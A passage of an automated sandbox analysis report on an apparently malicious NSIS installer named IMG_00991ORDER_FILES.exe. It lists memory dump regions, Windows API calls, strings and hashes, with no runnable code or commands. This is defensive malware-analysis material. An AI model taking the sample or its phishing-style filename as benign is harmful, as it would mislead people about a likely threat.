                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-769887912
                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                                                                    • GetSysColor.USER32(00000000), ref: 00404595
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                                                                    • SetBkMode.GDI32(?,?), ref: 004045AD
                                                                                    • GetSysColor.USER32(?), ref: 004045C0
                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D0
                                                                                    • DeleteObject.GDI32(?), ref: 004045EA
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FD6
                                                                                    • MulDiv.KERNEL32(000B536A,00000064,000B556E), ref: 00403001
                                                                                    • wsprintfW.USER32 ref: 00403011
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 0040300B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                                                    • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                                                                    • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                                                    • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                                                                    APIs
                                                                                      • Part of subcall function 6F8A12BB: GlobalAlloc.KERNEL32(00000040,?,6F8A12DB,?,6F8A137F,00000019,6F8A11CA,-000000A0), ref: 6F8A12C5
                                                                                    • GlobalFree.KERNEL32(?), ref: 6F8A2743
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A2778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 49648be17968c62e2adb418c8f057c6131c937c3cb7c9449a915e2745d43ef1f
                                                                                    • Instruction ID: 1730808a0820bce3b4c6e96551b8f60b6e354891d17bf2ba65ea64db9dc34cb9
                                                                                    • Opcode Fuzzy Hash: 49648be17968c62e2adb418c8f057c6131c937c3cb7c9449a915e2745d43ef1f
                                                                                    • Instruction Fuzzy Hash: C531D071104A05EFCF298F69CD84C2E77B6FB8731431549E9F1018B260CB3AA965DBA1
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A25C2
                                                                                      • Part of subcall function 6F8A12CC: lstrcpynW.KERNEL32(00000000,?,6F8A137F,00000019,6F8A11CA,-000000A0), ref: 6F8A12DC
                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6F8A2548
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F8A2563
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 4216380887-0
                                                                                    • Opcode ID: 00401872aec36550f252222eed4722e4074da0cb0c0bab32ac6ead67395910ee
                                                                                    • Instruction ID: 86042197e2d638dda83f07f179efb9fb69dea2caa9638d1f346fb58d92bbb92b
                                                                                    • Opcode Fuzzy Hash: 00401872aec36550f252222eed4722e4074da0cb0c0bab32ac6ead67395910ee
                                                                                    • Instruction Fuzzy Hash: AD4106B0408B09EFDB74DF29D840A6A77F8FB85310F004EDDE5068E581EB7AA550CBA1
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F8A22D8,?,00000808), ref: 6F8A16D5
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F8A22D8,?,00000808), ref: 6F8A16DC
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F8A22D8,?,00000808), ref: 6F8A16F0
                                                                                    • GetProcAddress.KERNEL32(6F8A22D8,00000000), ref: 6F8A16F7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A1700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 1148316912-0
                                                                                    • Opcode ID: d7abefdceb0875af0ebcbd90c0fe47eefe4139e41b89e2d6db436b637f87627e
                                                                                    • Instruction ID: 65efac88543fae7e24271ba8f801bae3903a512f502d85317c4164b964bfaeb1
                                                                                    • Opcode Fuzzy Hash: d7abefdceb0875af0ebcbd90c0fe47eefe4139e41b89e2d6db436b637f87627e
                                                                                    • Instruction Fuzzy Hash: 8EF012721065387BDE2016AA9C4CC9BBE9CEFCB2F5B110255F619911A08A654C21D7F1
                                                                                    APIs
                                                                                      • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                                                      • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405EDC
                                                                                      • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                                                      • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                                                                    • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405F84
                                                                                    • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                                                                    • API String ID: 3248276644-3222627218
                                                                                    • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                                                    • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                                                                    • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                                                    • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405E45
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3355392842
                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6F8A1171
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6F8A11E3
                                                                                    • GlobalFree.KERNEL32 ref: 6F8A124A
                                                                                    • GlobalFree.KERNEL32(?), ref: 6F8A129B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A12B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 1c90cd66f56027d0c9461dff4eda61f7f605f9652194519902d6360afd959d0c
                                                                                    • Instruction ID: 659cefa9c2c9b021ec7ef67e25c9f5bb34f099eb61389cc568a592d6beddc8b6
                                                                                    • Opcode Fuzzy Hash: 1c90cd66f56027d0c9461dff4eda61f7f605f9652194519902d6360afd959d0c
                                                                                    • Instruction Fuzzy Hash: 35517CB5500B05AFDF04CF6CC844A5A77A8FB46724B0449AAE944DF250EB3AE960CF94
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,0040321C,?), ref: 00403051
                                                                                    • GetTickCount.KERNEL32 ref: 0040306F
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                                                    • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                                                                    • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                                                    • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,76BF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,0000000A,?,00000008,0000000A,0000000C), ref: 00403BAB
                                                                                    • GlobalFree.KERNEL32(00A8E668), ref: 00403BB2
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3355392842
                                                                                    • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
